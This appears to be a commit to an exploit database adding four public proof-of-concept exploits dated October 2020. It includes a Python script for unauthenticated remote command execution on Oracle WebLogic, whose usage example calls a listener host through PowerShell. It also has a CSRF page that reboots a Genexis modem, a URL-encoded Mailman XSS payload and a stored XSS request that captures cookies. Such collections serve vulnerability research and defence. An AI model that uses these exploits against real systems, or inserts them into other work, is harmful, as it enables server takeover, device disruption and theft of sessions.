DB: 2020-10-30

4 changes to exploits/shellcodes Online Examination System 1.0 - 'name' Stored Cross Site Scripting Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS) WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot
2020-10-30 05:02:03 +00:00 · 2020-10-30 05:02:03 +00:00 · 48bd7b3ea6
commit 48bd7b3ea6
parent e178c80d85
5 changed files with 129 additions and 0 deletions
--- a/exploits/cgi/webapps/48970.txt
+++ b/exploits/cgi/webapps/48970.txt
@ -0,0 +1,29 @@
+# Title: Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)
+# Type:			Reflected XSS
+# Software:		Mailman
+# Version:		>=1.x <= 2.1.23
+# Vendor Homepage:	https://www.list.org
+# Original link:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5950
+# POC Author:		Valerio Alessandroni 
+# Date: 		28/10/2020
+# Description:		Cross-site scripting (XSS) vulnerability in the web UI in Mailman before 2.1.26 allows remote attackers to inject arbitrary web script or HTML via a user-options URL.
+#
+# https://127.0.0.1/cgi-bin/mailman/options/[LIST]/[EMAIL][XSS]
+# Which [LIST] is a valid list, [EMAIL] is a valid email and [XSS] is the payload
+#
+# For this POC I used the following payload
+# CVE:  CVE-2018-5950
+
+"accesskey%3d"x"onclick%3d"alert`XSS`"
+
+# Due the payload is loaded inside an HIDDEN INPUT TYPE, until today the only way to trigger the malicious code is via the accesskey attribute.
+# An URL Encoded version of the payload is 
+
+%22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22
+
+# URL Example:
+
+https://127.0.0.1/cgi-bin/mailman/options/list_name/test@test.com%22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22
+
+# In order to trigger the alert, the victim has to press the following buttons ALT+SHIFT+X
+# where X is an arbitrary button inserted as accesskey attribute in the payload.
--- a/exploits/hardware/webapps/48972.txt
+++ b/exploits/hardware/webapps/48972.txt
@ -0,0 +1,28 @@
+# Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot
+# Date: 10/28/2020
+# Exploit Author: Mohammed Farhan
+# Vendor Homepage: https://genexis.co.in/product/ont/
+# Version: Platinum-4410 Software version - P4410-V2-1.28
+# Tested on: Windows 10
+# Author Contact: https://twitter.com/farhankn
+
+Vulnerability Details
+=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
+Login to the application
+Create an HTML file using the below mentioned code
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action=3D"http://192.168.1.1/cgi-bin/mag-reset.asp" method=3D"POS=
+T">
+      <input type=3D"hidden" name=3D"rebootflag" value=3D"1" />
+      <input type=3D"hidden" name=3D"restoreFlag" value=3D"1" />
+      <input type=3D"hidden" name=3D"isCUCSupport" value=3D"0" />
+      <input type=3D"submit" value=3D"Submit request" />
+    </form>
+  </body>
+</html>
+
+Open the HTML page in the browser and Click on "Submit Request"
+Note that modem reboots after the same
--- a/exploits/java/webapps/48971.py
+++ b/exploits/java/webapps/48971.py
@ -0,0 +1,33 @@
+#!/usr/bin/python3
+
+# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0  - Unauthenticated RCE via GET request
+# Exploit Author: Nguyen Jang
+# CVE: CVE-2020-14882
+# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
+# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
+
+# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
+
+import requests
+import sys
+
+from urllib3.exceptions import InsecureRequestWarning
+
+if len(sys.argv) != 3:
+    print("[+] WebLogic Unauthenticated RCE via GET request")
+    print("[+] Usage : python3 exploit.py http(s)://target:7001 command")
+    print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")
+    print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")
+    exit()
+
+target = sys.argv[1]
+command = sys.argv[2]
+
+request = requests.session()
+headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}
+
+print("[+] Sending GET Request ....")
+
+GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)
+
+print("[+] Done !!")
--- a/exploits/php/webapps/48969.txt
+++ b/exploits/php/webapps/48969.txt
@ -0,0 +1,35 @@
+# Exploit Title: Online examination system 1.0 - 'name' Stored Cross Site Scripting
+# Date: 29/10/2020
+# Exploit Author: Nikhil Kumar (https://www.linkedin.com/in/nikhil-kumar-4b9443166/)
+# Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php
+# Software Link: https://github.com/projectworldsofficial/online-examination-systen-in-php.git
+# Version: 1.0
+# Tested On: Ubntu 18 + Xampp-linux-x64-5.5.38-3
+
+Step 1: Open the URL http://localhost/online-examination-systen-in-php/index.php and fill the sign up form 
+
+http://localhost/exam_system/sign.php?q=account.php
+
+Step 2 : Use payload ><script>alert(document.cookie)</script> in "name=" field 
+
+Malicious Request
+-----------------
+
+POST /exam_system/sign.php?q=account.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 157
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/exam_system/index.php
+Cookie: security_level=1; PHPSESSID=kue9gcj3bs2329e8mctsokaod7
+Upgrade-Insecure-Requests: 1
+
+name=test><script>alert(document.cookie)</script>&gender=M&college=test&email=test@test.com&mob=8888888888&password=123456&cpassword=123456
+
+
+Step 3: Cookie will be reflected each time user logged in with their credentials
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -40787,6 +40787,10 @@ id,file,description,date,author,type,platform,port
 48959,exploits/php/webapps/48959.py,"Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)",2020-10-28,"Matthew Aberegg",webapps,php,
 48960,exploits/php/webapps/48960.txt,"CSE Bookstore 1.0 - Authentication Bypass",2020-10-28,"Alper Basaran",webapps,php,
 48964,exploits/linux/webapps/48964.txt,"Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion",2020-10-28,"Ivo Palazzolo",webapps,linux,
+48969,exploits/php/webapps/48969.txt,"Online Examination System 1.0 - 'name' Stored Cross Site Scripting",2020-10-29,"Nikhil Kumar",webapps,php,
+48970,exploits/cgi/webapps/48970.txt,"Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)",2020-10-29,"Valerio Alessandroni",webapps,cgi,
+48971,exploits/java/webapps/48971.py,"WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request",2020-10-29,"Mohammed Althibyani",webapps,java,
+48972,exploits/hardware/webapps/48972.txt,"Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot",2020-10-29,"Mohammed Farhan",webapps,hardware,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,